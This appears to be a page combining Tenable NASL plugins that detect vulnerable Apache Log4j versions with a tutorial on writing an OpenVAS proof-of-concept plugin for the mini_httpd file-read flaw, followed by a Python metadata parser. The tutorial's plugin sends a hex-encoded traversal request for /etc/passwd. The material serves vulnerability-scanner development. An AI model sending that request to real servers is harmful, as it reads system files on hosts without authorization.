versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"all");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44832");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/28");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_nix_installed.nbin", "apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app);

var constraints = [
  {'min_version':'2.0', 'fixed_version':'2.3.2'},
  {'min_version':'2.4', 'fixed_version':'2.12.4'},
  {'min_version':'2.13', 'fixed_version':'2.17.1'}
];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);

  • apache_log4j_unsupported.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156032);
  script_version("1.2");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/19");

  script_name(english:"Apache Log4j Unsupported Version Detection");

  script_set_attribute(attribute:"synopsis", value:
"A logging library running on the remote host is no longer supported.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version number, the installation of Apache Log4j on the remote host is no longer
supported. Log4j reached its end of life prior to 2016.

Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it is
likely to contain security vulnerabilities.");
  # https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?59f655a2");
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version of Apache Log4j that is currently supported.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"manual");
  script_set_attribute(attribute:"cvss_score_rationale", value:"Tenable score for unsupported software.");
  script_set_attribute(attribute:"agent", value:"all");

  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/13");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"unsupported_by_vendor", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_win_installed.nbin", "apache_log4j_nix_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j");

  exit(0);
}

include('vcf.inc');

var app = 'Apache Log4j';
var win_local = FALSE;

if (get_kb_item('SMB/Registry/Enumerated'))
  win_local = TRUE;

var app_info = vcf::get_app_info(app:app, win_local:win_local);

var ver  = app_info['version'];
var path = app_info['path'];
var port = app_info['port'];

if (!port)
  port = 0;

# Versions < 2 are EOL, so audit if version >= 2
if (ver_compare(ver:ver, fix:'2.0', strict:FALSE) >= 0)
  vcf::audit(app_info);

register_unsupported_product(
  product_name : app,
  cpe_base     : 'apache:log4j',
  cpe_class    : CPE_CLASS_APPLICATION,
  is_custom_cpe: FALSE,
  version      : ver
);

var report = strcat(
  '\n  Path              : ', path,
  '\n  Installed version : ', ver,
  '\n');

security_report_v4(severity:SECURITY_HOLE, port:port, extra:report);

  • apache_log4j_win_2_15_0.nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(156002);
  script_version("1.13");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/12/23");

  script_cve_id("CVE-2021-44228");
  script_xref(name:"IAVA", value:"2021-A-0573");
  script_xref(name:"IAVA", value:"2021-A-0596");
  script_xref(name:"IAVA", value:"2021-A-0597");
  script_xref(name:"IAVA", value:"2021-A-0598");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/12/24");

  script_name(english:"Apache Log4j < 2.15.0 Remote Code Execution (Windows)");

  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Apache Log4j on the remote host is 2.x < 2.15.0. It is, therefore, affected by a remote code execution
vulnerability in the JDNI parser due to improper log validation. An unauthenticated, remote attacker can exploit this
to bypass authentication and execute arbitrary commands. 

Log4j 1.x, which reached its End of Life prior to 2016, comes with JMSAppender which will perform a JNDI lookup if
enabled in Log4j's configuration file, hence customers should evaluate triggers in 1.x based on the risk that it is EOL
and whether JNDI lookups are enabled.

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/apache/logging-log4j2/pull/608");
  script_set_attribute(attribute:"see_also", value:"https://logging.apache.org/log4j/2.x/security.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Apache Log4j version 2.15.0 or later, or apply the vendor mitigation.

Upgrading to the latest versions for Apache Log4j is highly recommended as intermediate 
versions / patches have known high severity vulnerabilities and the vendor is updating 
their advisories often as new research and knowledge about the impact of Log4j is 
discovered. Refer to https://logging.apache.org/log4j/2.x/security.html for the latest 
versions.");
  script_set_attribute(attribute:"agent", value:"windows");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-44228");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/10");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:log4j");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("apache_log4j_win_installed.nbin");
  script_require_keys("installed_sw/Apache Log4j", "SMB/Registry/Enumerated");

  exit(0);
}

include('vcf.inc');

get_kb_item_or_exit('SMB/Registry/Enumerated');

var app = 'Apache Log4j';

var app_info = vcf::get_app_info(app:app, win_local:TRUE);

if (app_info['JndiLookup.class association'] == 'Not Found')
  audit(AUDIT_OS_CONF_NOT_VULN, app, app_info.version);

var constraints = [{ 'min_version' : '2.0', 'fixed_version' : '2.15.0' }];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);

How to write a NASL script

I recently took part in a vulnerability-scanning project. After comparing Nessus and OpenVAS, we found that a scanner built on OpenVAS has the edge, mainly because OpenVAS's command line can directly add target IPs, pick the scan method and export the final report. That lets a development team embed OpenVAS inside a program that exposes only an IP interface: a scan task is started for the given IP and the finished report is exported. OpenVAS ships roughly 46,000 plugins and Nessus more than 100,000, but more plugins are not automatically better, since scan duration is itself an important measure of a scanner.

Because the plugin library needs ongoing maintenance and development, I studied OpenVAS's whole invocation logic. Below I use mini-httpd as an example to explain how I developed the corresponding PoC plugin.

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100001");
  # The plugin's internal OID. This follows a naming convention: only the last two components
  # may be chosen by the user (see OpenVAS's official NASL writing documentation).
  # For convenience I changed only the last component, i.e. 100001
  script_version("$Revision: 11357 $");
  script_cve_id("CVE-2018-18778");
  # The corresponding CVE number
  script_bugtraq_id(99999);
  script_tag(name:"cvss_base", value:"9.3");
  # CVSS score. The High/Medium/Low rating OpenVAS prints at the end is simply derived from this
  # CVSS score, so this value directly decides whether the vulnerability is rated High or Medium
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  # A related value is the QoD (Quality of Detection) score, set via the qod_type tag below. It
  # roughly expresses how reliable the detection is: if detection is difficult the score may be
  # below 60, and by default the report only lists vulnerabilities scoring 70 or above.
  # So if you want your own plugin's findings to appear in the report, keep the QoD as high as
  # possible; this template scores roughly 99
  script_tag(name:"last_modification", value:"$Date: 2018-10-22 12:57:05 +0200 (Wed, 12 Sep 2018) $");
  script_tag(name:"creation_date", value:"2018-10-22 16:21:31 +0100 (Fri, 16 Mar 2012)");
  script_name("mini_httpd");
  # Vulnerability name
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2018 ADog");
  script_family("Backdoors");
  script_xref(name:"URL", value:"http://www.foreversong.cn/");

  script_tag(name:"impact", value:"由于没有过滤Http包头的特定字段,导致可以构造访问系统文件的路径,从而导致可访问任意文件,攻击者可以利用该漏洞读取设备的任意文件,这将严重威胁采用Mini_httpd的设备的安全性。");
  # Impact of the vulnerability
  script_tag(name:"affected", value:"mini_httpd");
  # Affected scope
  script_tag(name:"insight", value:"mini_httpd_insight");
  script_tag(name:"solution", value:"下载最新ACME mini_httpd 1.3版本");
  # Remediation advice
  script_tag(name:"summary", value:"serious_bug");
  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

# Vulnerability check
## Variable Initialization
port = 8080;
# mini_httpd's default port

## Check Port status
if(!get_port_state(port)){
  # In my tests, ports that were not open all returned 1 and open ports returned 10000, so this
  # return value can serve as the port check
  display("ADog:get_port_state failed.",port,"\n");
  exit(0);
}

## Open the socket
sock = open_sock_tcp(port);
if(!sock){
  # Same idea as above: the socket can be opened whenever the port is open, so this block is optional
  display("ADog:open_sock_tcp failed.",port,"\n");
  exit(0);
}

## Constructed directory traversal crafted request
req = raw_string(0x47, 0x45, 0x54, 0x20, 0x2f, 0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73, 0x77, 0x64, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2f, 0x31, 0x2e, 0x31, 0x0d, 0x0a, 0x48, 0x6f, 0x73, 0x74, 0x3a, 0x20, 0x0d, 0x0a, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x4d, 0x61, 0x63, 0x69, 0x6e, 0x74, 0x6f, 0x73, 0x68, 0x3b, 0x20, 0x49, 0x6e, 0x74, 0x65, 0x6c, 0x20, 0x4d, 0x61, 0x63, 0x20, 0x4f, 0x53, 0x20, 0x58, 0x20, 0x31, 0x30, 0x2e, 0x31, 0x33, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x36, 0x33, 0x2e, 0x30, 0x29, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x2f, 0x32, 0x30, 0x31, 0x30, 0x30, 0x31, 0x30, 0x31, 0x20, 0x46, 0x69, 0x72, 0x65, 0x66, 0x6f, 0x78, 0x2f, 0x36, 0x33, 0x2e, 0x30, 0x0d, 0x0a, 0x41, 0x63, 0x63, 0x65, 0x70, 0x74, 0x3a, 0x20, 0x74, 0x65, 0x78, 0x74, 0x2f, 0x68, 0x74, 0x6d, 0x6c, 0x2c, 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2f, 0x78, 0x68, 0x74, 0x6d, 0x6c, 0x2b, 0x78, 0x6d, 0x6c, 0x2c, 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x2f, 0x78, 0x6d, 0x6c, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x39, 0x2c, 0x2a, 0x2f, 0x2a, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x38, 0x0d, 0x0a, 0x41, 0x63, 0x63, 0x65, 0x70, 0x74, 0x2d, 0x4c, 0x61, 0x6e, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3a, 0x20, 0x7a, 0x68, 0x2d, 0x43, 0x4e, 0x2c, 0x7a, 0x68, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x38, 0x2c, 0x7a, 0x68, 0x2d, 0x54, 0x57, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x37, 0x2c, 0x7a, 0x68, 0x2d, 0x48, 0x4b, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x35, 0x2c, 0x65, 0x6e, 0x2d, 0x55, 0x53, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x33, 0x2c, 0x65, 0x6e, 0x3b, 0x71, 0x3d, 0x30, 0x2e, 0x32, 0x0d, 0x0a, 0x43, 0x6f, 0x6e, 0x6e, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x3a, 0x20, 0x63, 0x6c, 0x6f, 0x73, 0x65, 0x0d, 0x0a, 0x55, 0x70, 0x67, 0x72, 0x61, 0x64, 0x65, 0x2d, 0x49, 0x6e, 0x73, 0x65, 0x63, 0x75, 0x72, 0x65, 0x2d, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x73, 0x3a, 0x20, 0x31, 0x0d, 0x0a, 
0x0d, 0x0a);
# The most important part is this PoC. Since the target is a web server the payload is an HTTP
# request; hex-decode it and you will see it is simply a web request
# I first reproduced the vulnerability in Burp, copied the request and converted it to hex
# OpenVAS does ship HTTP helper functions, but I still used a raw socket: if a later target is not
# a web service the web functions are unusable, so a socket is the most general approach

## Send the attack request and receive the response
display("ADog:port is working.",port,"\n");

send(socket:sock, data:req);
ret = recv(socket:sock, length:1024);
# Read the response
close(sock);

#display("ADog:recv:",ret);

state = egrep(pattern:'^root.*',string:ret);
# OpenVAS's built-in matching function, used here to look for the string root: the vulnerability
# is an arbitrary file read and I requested /etc/passwd, so the first line holds the root user's entry
# If it is present, the vulnerability is considered confirmed
# This is where customisation comes in: we can write NASL scripts for a company's internal
# vulnerabilities. Anyone who reads the scripts closely knows that mainstream scanners mostly just
# match versions, partly to keep scans non-destructive, although some plugins do carry a real PoC

if(state)
{
  report = 'mini_httpd is vulnerable!\n';
  security_message(data:report);
  # Use OpenVAS's built-in report function to write the finding into the scan report
  #security_message(port:port);
  # Only one of these two calls is needed; I used both while testing and the finding then
  # appeared twice in the report
  display('mini_httpd is vulnerable.\n');
}

Overall, web vulnerability plugins are comparatively easy to write. A short note on compiling with openvas-nasl: once the script is written, you first compile it to check for syntax errors. openvas-nasl has to be installed separately; it is not a bundled tool.

First option: without the built-in certificate and signature. OpenVAS's plugin feed is signed and authenticated, so OpenVAS will not call a self-written plugin unless that plugin is signed and authenticated first. openvas-nasl does have a parameter for running without the authentication check, but it did not work well for me: in my own tests I never got any output back.

Second option: sign the script following the procedure linked above, after which it can be compiled and called (signing is very finicky and will most likely fail, for all sorts of reasons).

openvas-nasl -p script.nasl

The -p parameter compiles the NASL script; any syntax errors are printed.

openvas-nasl -t 192.168.2.105 script.nasl

This runs the script against a specific IP. If the script calls OpenVAS's built-in functions, you may also need the -i parameter to include the OpenVAS plugin library directory.

The display function used above is basically a print function, there mainly for convenient debugging.

Finally, the docker image I used to set up the environment: atomicorp/openvas
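Both the Tenable Log4j plugins above and the mini_httpd tutorial plugin keep their metadata in script_* calls, and the tutorial notes that a finding only reaches the report when its QoD is 70 or higher. As an added example (not code from this page, Tenable or Greenbone), the Python below parses either style of description block, greps a feed for a keyword such as log4j, and derives the QoD a finding would be reported with; the qod_type-to-QoD table is assumed from Greenbone's documentation, and the sample feed is constructed from trimmed copies of the blocks shown above.

```python
import re

# QoD per qod_type as listed in Greenbone's QoD docs (assumed values; check them against your
# feed). Findings below the default QoD threshold of 70 are hidden in reports.
QOD_BY_TYPE = {
    "remote_vul": 99, "remote_app": 98, "package": 97, "registry": 97,
    "remote_active": 95, "remote_banner": 80, "executable_version": 80,
    "remote_analysis": 70, "remote_probe": 50, "remote_banner_unreliable": 30,
}
# Nessus: script_set_attribute(attribute:"k", value:"v"); OpenVAS: script_tag(name:"k", value:"v").
# Values may span several lines, as the synopsis/solution texts above do.
_TAG = re.compile(r'(?:script_set_attribute|script_tag)\s*\(\s*(?:attribute|name)\s*:\s*'
                  r'"([^"]+)"\s*,\s*value\s*:\s*"((?:[^"\\]|\\.)*)"')
_ID = re.compile(r'script_(?:id|oid)\s*\(\s*"?([\d.]+)"?\s*\)')
_NAME = re.compile(r'script_name\s*\(\s*(?:english\s*:\s*)?"([^"]+)"')
_CVE = re.compile(r'script_cve_id\s*\(([^)]*)\)')

def parse_nasl_header(src):
    """Pull id/oid, name, CVEs and every tag out of a NASL description block."""
    meta = {k: " ".join(v.split()) for k, v in _TAG.findall(src)}
    for key, rx in (("id", _ID), ("name", _NAME)):
        m = rx.search(src)
        meta[key] = m.group(1) if m else None
    m = _CVE.search(src)
    meta["cves"] = re.findall(r"CVE-\d{4}-\d{4,}", m.group(1)) if m else []
    return meta

def qod_score(meta):
    """QoD the finding is reported with: an explicit qod tag wins over qod_type."""
    qod = str(meta.get("qod", ""))
    return int(qod) if qod.isdigit() else QOD_BY_TYPE.get(meta.get("qod_type"), 0)

def find_plugins(feed, keyword):
    """Filenames whose name, CVEs or description mention keyword, like grepping the feed."""
    def hay(meta):
        return f'{meta["name"]} {" ".join(meta["cves"])} {meta.get("description", "")}'.lower()
    return sorted(f for f, src in feed.items() if keyword.lower() in hay(parse_nasl_header(src)))

# Constructed sample feed: trimmed copies of the two description blocks shown above.
SAMPLE_FEED = {
    "apache_log4j_win_2_15_0.nasl": '''script_id(156002);
  script_cve_id("CVE-2021-44228");
  script_name(english:"Apache Log4j < 2.15.0 Remote Code Execution (Windows)");
  script_set_attribute(attribute:"synopsis", value:
"A package installed on the remote host is affected by a remote code execution vulnerability.");''',
    "mini_httpd.nasl": '''script_oid("1.3.6.1.4.1.25623.1.0.100001");
  script_cve_id("CVE-2018-18778");
  script_name("mini_httpd");
  script_tag(name:"qod_type", value:"remote_vul");''',
}
```

Point find_plugins at a dict built by reading every .nasl file in the unpacked plugin package to get the same keyword search over the real feed.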
